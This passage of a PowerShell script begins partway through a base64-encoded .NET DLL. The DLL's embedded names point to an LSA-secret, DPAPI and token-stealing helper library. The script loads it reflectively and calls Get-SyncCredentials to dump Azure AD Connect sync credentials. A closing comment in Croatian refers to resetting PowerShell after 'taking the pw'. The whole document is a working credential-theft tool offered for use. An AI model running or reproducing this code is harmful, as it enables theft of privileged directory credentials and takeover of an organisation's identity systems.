NEB4QBYA9YB2QDXDNwBDABYA+EBSQHJCecBQQFDAOwBSQHqB/ABQQGkD/cBSQHjCA8CSQHqBxQCSQH0DCACSQGjESkC6QDXDJABSQHwCOcBeQFCDz8CqQHXDEUCsQHXDBAAgQDXDAYAeQGFCGUCuQHXDBAACQAEAIQCBwAoAIkCCQBsAIwCCQBwAJECCQB0AJYCCQB4AJsCCQB8AKACCAAZA6UCAgA5A6oCCQBhA6wCCQBlA7ECCQB5A7YCDgCBA7sCDgCFA9gCEgCRA/cCCQCVA/wCLgALAFMFLgATAFwFLgAbAHsFLgAjAIQFLgArAK8FLgAzAK8FLgA7AK8FLgBDALUFLgBLAMMFLgBTAK8FLgBbAK8FLgBjAOcFLgBrABEGLgBzAB4GYwCTAIwCwAF7AGgGwAGDAIwC4wFjAHUG4wGLAJ8GAwJjAKgGGgABAzIAAwNIAAYDTwAGA10ABgNhAAYDawAGA3UABgN7AAYDswAGA8kABgPXAAYD8QABA/cAAQP/AAEDDwEBAx0BAQMtAQgDMwEIA9UBAQMEAAAAAAAJAAEAEAAAABIAKQB/ALgAwgDtACcBPAFjAagB/AEyAksCVAJcAmECPwkmCRkJMwliCUwJVwm5AQQBAwBkDgEABAEFAE4OAQAEAQcA1wcBAAQBCQDQCwEAQAELAAMRAgBAAQ0AqAIDAEABDwCjEAMAQAERALARAwBAARMAtQUDAAABFQDgDgIAQAEXALgKAgBAARkAtQcDAEABGwCuDQMAQAEdAAMEAgBAAR8AmgoDAEABIQCLCgMARgEjAE8QAwBGASUAPggDAEYBJwCZCQMAQAEpAMACAwBAASsAhwkDAEABLQBvCAMAQAEvAFwRAwBEATEAYxADAEYBMwAyEQMARgE1APcQAwBGATcATREDAEABOQDtDwMAQAE7ALMJAwBAAT0AvwMCAEABPwCTBQQAQAFBAOQLBQBAAUMAMREFAEABRQBMEQUAQAFHAPwRBQBAAUkA3xAFAEABSwBSDwUAQAFNAOwPBgBEAU8AJQwHAEQBUQA9CAcARAFTAL8CBwBEAVUAVQgHAEQBVwDqEQcARAFZAAgMBwBEAVsAbggHAEQBXQAnAAcA/GEAAAIADGIAAAMABIAAAAAACQAAAAAAAAAAAAAAfRAAAAQAAAAAAAAAAAAAAGkC6AIAAAAABAAAAAAAAAAAAAAAaQLXCQAAAAADAAAAAAAAAAAAAAByAuYKAAAAAAQAAAAAAAAAAAAAAHsC2hEAAAAABAACAAUAAgAGAAIABwACAAgAAgAJAAIACgACAAsAAgAMAAIADQACAA4AAgAPAAIAEAACABEAAgASAAMAWwCLAX0AGwJ/ABsCAAAATGlzdGAxAE51bGwxAFVJbnQzMgBUb0ludDMyAGdldFBCS0RGMgBCQ3J5cHREZXJpdmVLZXlQQktERjIATnVsbDIAVG9JbnQ2NABBNUVEMTZFRDJEODJCQjAxNkM5RjBDQjM2RTA0QTY2OEQ5M0RFQzMyMEJEMzc3RUMzNzVCRUNENThBOEZFNkE1AF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9MTYAZ2V0X1VURjgAPE1vZHVsZT4APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+AEVSUk9SX01PUkVfREFUQQA4MjVEMTYwQkVCRUM5REZBMTkyRkM3RDczRjE2MTBBNDBGNUNCNzVCQjNDRjk0RDI1RTM3NTQzNkY3NEI1RUVCAENSWVBUX0RBVEFfQkxPQgBnZXRITUFDAExVSUQATFNBX1VOSUNPREVfU1RSSU5HAERIQ1BDQVBJX1JFUVVFU1RfTUFTSwBESENQQ0FQSV9SRVFVRVNUX0NBTkNFTABTRUNVUklUWV9JTVBFUlNPTkFUSU9OX0xFVkVMAFN5c3RlbS5JTwBMU0FfQlVGRkVSAFRPS0VOX1BSSVZJTEVHRVMATFVJRF9BTkRfQVRUUklCVVRFUwBMU0FfT0JKRUNUX0FUVFJJQlVURVMAREhDUENBUElfUEFSQU1TAERIQ1BDQVBJX1JFUVVFU1RfQVNZTkNIUk9OT1VTAERIQ1BDQVBJX1JFUVVFU1RfU1lOQ0hST05PVVMAREhDUENBUElfUkVRVUVTVF9QRVJTSVNURU5UAERIQ1BDQVBJX1BBUkFNU19BUlJBWQB2YWx1ZV9fAGNiRGF0YQBwYkRhdGEAUHJvdGVjdGVkRGF0YQBnZXREZWNyeXB0ZWREYXRhAExzYVJldHJpZXZlUHJpdmF0ZURhdGEAQkNyeXB0SGFzaERhdGEAbkJ5dGVzRGF0YQBwYktleURhdGEAZGF0YQBtc2NvcmxpYgBnZXREUEFQSUJsb2IAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMAcHN6QWxnSWQAYWxnSWQAT3B0aW9uSWQAb3B0aW9uSWQAQ2xhc3NJZABscGNQcm9jZXNzSWQAUEhUaHJlYWQAQWRkAGxwUmVzZXJ2ZWQAQWxnaWQATmV3R3VpZABscEx1aWQAY2JQYXNzd29yZABwYlBhc3N3b3JkAHN6UGFzc3dvcmQAcGFzc3dvcmQAU2VjdXJpdHlRdWFsaXR5T2ZTZXJ2aWNlAExvY2FsRnJlZQBIYXNodGFibGUAZ2V0X0hhbmRsZQBSdW50aW1lRmllbGRIYW5kbGUAUnVudGltZVR5cGVIYW5kbGUAQ2xvc2VIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUARHVwbGljYXRlVG9rZW5IYW5kbGUARXhpc3RpbmdUb2tlbkhhbmRsZQBQcm9jZXNzSGFuZGxlAE9iamVjdEhhbmRsZQBscGNiSW5oZXJpdEhhbmRsZQBQb2xpY3lIYW5kbGUAU2FmZVJlZ2lzdHJ5SGFuZGxlAENvbnNvbGUAbHBTeXN0ZW1OYW1lAGxwTmFtZQBzelByb3ZpZGVyTmFtZQBBZGFwdGVyTmFtZQBhZGFwdGVyTmFtZQBwcm9jZXNzTmFtZQBPYmplY3ROYW1lAEdldFByb2Nlc3Nlc0J5TmFtZQBLZXlOYW1lAG5hbWUAbHBmdExhc3RXcml0ZVRpbWUAV3JpdGVMaW5lAERhdGFQcm90ZWN0aW9uU2NvcGUAZHdCbG9iVHlwZQBzekJsb2JUeXBlAENvbUludGVyZmFjZVR5cGUAc291cmNlVHlwZQBWYWx1ZVR5cGUAdGFyZ2V0VHlwZQBkd1Byb3ZUeXBlAFBGWEltcG9ydENlcnRTdG9yZQBQdHJUb1N0cnVjdHVyZQBMc2FDbG9zZQBSZXZlcnNlAE5ld1N0YXRlAFdyaXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUASW50ZXJmYWNlVHlwZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJlbGlhYmlsaXR5Q29udHJhY3RBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTdXBwcmVzc1VubWFuYWdlZENvZGVTZWN1cml0eUF0dHJpYnV0ZQBCeXRlAExvb2t1cFByaXZpbGVnZVZhbHVlAE5hdGl2ZQBwU2l6ZQBEaGNwQ0FwaUluaXRpYWxpemUAU2l6ZU9mAGdldFNIQTI1NndpdGhITUFDRmxhZwBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFRvU3RyaW5nAEdldFN0cmluZwBCQ3J5cHRDcmVhdGVIYXNoAHBoSGFzaABCQ3J5cHRGaW5pc2hIYXNoAGdldEhhc2gAQkNyeXB0RGVzdHJveUhhc2gATWF0aABnZXRfTGVuZ3RoAE1heGltdW1MZW5ndGgATWF4TGVuZ3RoAFB0clRvU3RyaW5nVW5pAEdldENvb2tpZUluZm9Gb3JVcmkAZ2V0Q29va2llSW5mb0ZvclVyaQB1cmkAQWxsb2NIR2xvYmFsAEZyZWVIR2xvYmFsAE1hcnNoYWwARmluYWwAaXNEUEFQSUludGVyYWwAYWR2YXBpMzIuZGxsAGtlcm5lbDMyLmRsbABjcnlwdDMyLmRsbABkaGNwY3N2Yy5kbGwATmNyeXB0LmRsbABiY3J5cHQuZGxsAG5jcnlwdC5kbGwAV2luMzJOdHYuZGxsAE1lbW9yeVN0cmVhbQBDcnlwdEdldEhhc2hQYXJhbQBDcnlwdFNldEhhc2hQYXJhbQBkd1BhcmFtAENyeXB0U2V0S2V5UGFyYW0AaE1lbQBGcmVlQ29UYXNrTWVtAFN5c3RlbQBoQWxnb3JpZ2htAHBoQWxnb3JpdGhtAEVudW0AcGR3RGF0YUxlbgBkYXRhTGVuAGxwY2JNYXhWYWx1ZU5hbWVMZW4AbHBjYk1heFZhbHVlTGVuAGxwY2JNYXhDbGFzc0xlbgBtYXhMZW4AbHBjYk1heFN1YktleUxlbgBrZXlMZW4AY29weVBUQVRva2VuAGNvcHlBREZTVG9rZW4AY29weUFEU3luY1Rva2VuAFNldFRocmVhZFRva2VuAER1cGxpY2F0ZVRva2VuAGNvcHlMc2Fzc1Rva2VuAE9wZW5Qcm9jZXNzVG9rZW4AY29weVByb2Nlc3NUb2tlbgBNaW4AVmVyc2lvbgBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uAHBzekltcGxlbWVudGF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEFyZ3VtZW50T3V0T2ZSYW5nZUV4Y2VwdGlvbgBFeHRlcm5hbEV4Y2VwdGlvbgBTeXN0ZW0uUnVudGltZS5Db25zdHJhaW5lZEV4ZWN1dGlvbgBDb3B5VG8AcE1hY0luZm8AVW5zYWZlUHJvb2ZPZlBvc3Nlc3Npb25Db29raWVJbmZvAHBQYWRkaW5nSW5mbwBoYXNoQWxnbwBjcnlwdEFsZ28AWmVybwBEaGNwQ0FwaUNsZWFudXAAQ2VyAE5DcnlwdE9wZW5TdG9yYWdlUHJvdmlkZXIAaFByb3ZpZGVyAEJDcnlwdENsb3NlQWxnb3JpdGhtUHJvdmlkZXIAQkNyeXB0T3BlbkFsZ29yaXRobVByb3ZpZGVyAFdpbmRvd3NUb2tlblByb3ZpZGVyAHBzelByb3ZpZGVyAFN0cmluZ0J1aWxkZXIAQnVmZmVyAGJ1ZmZlcgBJUHJvb2ZPZlBvc3Nlc3Npb25Db29raWVJbmZvTWFuYWdlcgBwc3pDb250YWluZXIAQml0Q29udmVydGVyAElzVmVuZG9yAEdldExhc3RXaW4zMkVycm9yAC5jdG9yAGxwY2JTZWN1cml0eURlc2NyaXB0b3IAU3RydWN0dXJlVG9QdHIASW50UHRyAERhdGFTdHIAUmVxdWVzdElkU3RyAE5hbWVTdHIAUDNQSGVhZGVyU3RyAHN0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMARGlzYWJsZUFsbFByaXZpbGVnZXMAQWRqdXN0VG9rZW5Qcml2aWxlZ2VzAE1pY3Jvc29mdC5XaW4zMi5TYWZlSGFuZGxlcwBPYmplY3RBdHRyaWJ1dGVzAEdldEJ5dGVzAGxwY1ZhbHVlcwBEaGNwUmVxdWVzdEZsYWdzAGR3RmxhZ3MAZmxhZ3MAQUFESW50ZXJuYWxzAFJlY2RQYXJhbXMAU2VuZFBhcmFtcwBuUGFyYW1zAERoY3BVbmRvUmVxdWVzdFBhcmFtcwBEaGNwUmVxdWVzdFBhcmFtcwBjSXRlcmF0aW9ucwBpdGVyYXRpb25zAFN5c3RlbS5Db2xsZWN0aW9ucwBSdW50aW1lSGVscGVycwBscGNiQ2xhc3MAbHBDbGFzcwBEZXNpcmVkQWNjZXNzAGxwY1Byb2Nlc3NBY2Nlc3MAT3BlblByb2Nlc3MAR2V0Q3VycmVudFByb2Nlc3MASVBBZGRyZXNzAGdldFdpcmVTZXJ2ZXJJcEFkZHJlc3MAbHBjU3ViS2V5cwBnZXRMc2FCYWNrdXBLZXlzAENvbmNhdABGb3JtYXQAUFNPYmplY3QATkNyeXB0RnJlZU9iamVjdABjYkhhc2hPYmplY3QAcGJIYXNoT2JqZWN0AFVucHJvdGVjdABTeXN0ZW0uTmV0AGNiU2VjcmV0AHBiU2VjcmV0AG9wX0V4cGxpY2l0AGNiU2FsdABwYlNhbHQAc2FsdABwY2JSZXN1bHQAUHJpdmlsZWdlQ291bnQAY29va2llSW5mb0NvdW50AE5DcnlwdERlY3J5cHQASGlnaFBhcnQATG93UGFydABwUGFyYW1ldGVyTGlzdABjYklucHV0AHBiSW5wdXQAY2JPdXRwdXQAcGJPdXRwdXQAb3V0cHV0AFN5c3RlbS5UZXh0AENyeXB0QWNxdWlyZUNvbnRleHQAQ3J5cHRSZWxlYXNlQ29udGV4dABoUHJvdgBXaW4zMk50dgBwUGZ4AEluaXRpYWxpemVBcnJheQBUb0FycmF5AExzYU9wZW5Qb2xpY3kAQ29uc2lzdGVuY3kAaFB1YktleQBjYkRlcnZpZWRLZXkAcGJEZXJpdmVkS2V5AE5DcnlwdEZpbmFsaXplS2V5AHBoS2V5AENyeXB0R2VuS2V5AFJlZ1F1ZXJ5SW5mb0tleQBoRXhwS2V5AGNvbnZlcnRLZXkAaEltcG9ydEtleQBOQ3J5cHRJbXBvcnRLZXkAaEV4cG9ydEtleQBOQ3J5cHRFeHBvcnRLZXkAQ3J5cHREZXN0cm95S2V5AExTQUJhY2t1cGtleQBnZXRNYXN0ZXJrZXkAU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeQBDb3B5AGVudHJvcHkATHNhRnJlZU1lbW9yeQBSb290RGlyZWN0b3J5AG9wX0luZXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AEJDcnlwdEdldFByb3BlcnR5AE5DcnlwdFNldFByb3BlcnR5AHBzelByb3BlcnR5AAAAAA9hAGQAZgBzAHMAcgB2AAALbABzAGEAcwBzAAATbQBpAGkAcwBlAHIAdgBlAHIAAENBAHoAdQByAGUAQQBEAEMAbwBuAG4AZQBjAHQAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAEEAZwBlAG4AdAAAGUEAQQBEAEkAbgB0AGUAcgBuAGEAbABzAAADeAAAGUUAcgByAG8AcgA6ACAAMAB4AHsAMAB9AABJMAAwADAAMAAwADAAMAAwAC0AMAAwADAAMAAtADAAMAAwADAALQAwADAAMAAwAC0AMAAwADAAMAAwADAAMAAwADAAMAAwADAAASlHACQAQgBDAEsAVQBQAEsARQBZAF8AUABSAEUARgBFAFIAUgBFAEQAABlHACQAQgBDAEsAVQBQAEsARQBZAF8AUAAAF0cAJABCAEMASwBVAFAASwBFAFkAXwAAB1IAUwBBAAANTABlAGcAYQBjAHkAAAluAGEAbQBlAAAJZABhAHQAYQAAC2YAbABhAGcAcwAAE3AAMwBwAGgAZQBhAGQAZQByAAAtVwBpAG4AZABvAHcAcwBBAHoAdQByAGUARwB1AGUAcwB0AEEAZwBlAG4AdAAAT00AaQBjAHIAbwBzAG8AZgB0ACAAUwBvAGYAdAB3AGEAcgBlACAASwBlAHkAIABTAHQAbwByAGEAZwBlACAAUAByAG8AdgBpAGQAZQByAAAbRQB4AHAAbwByAHQAIABQAG8AbABpAGMAeQAABXgAOAAADVMASABBADIANQA2AAAvUABhAHMAcwB3AG8AcgBkACAAYwBhAG4AbgBvAHQAIABiAGUAIABuAHUAbABsA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="

$DLLBytes = [System.Convert]::FromBase64String($base64dll)
[System.Reflection.Assembly]::Load($DLLBytes)

$credentials = Get-SyncCredentials -AsBackgroundProcess $false
return $credentials | Format-List

Write-Verbose "Powershell tokeni ne stimaju resetiraj powershell nakon uzimanja pw-a"

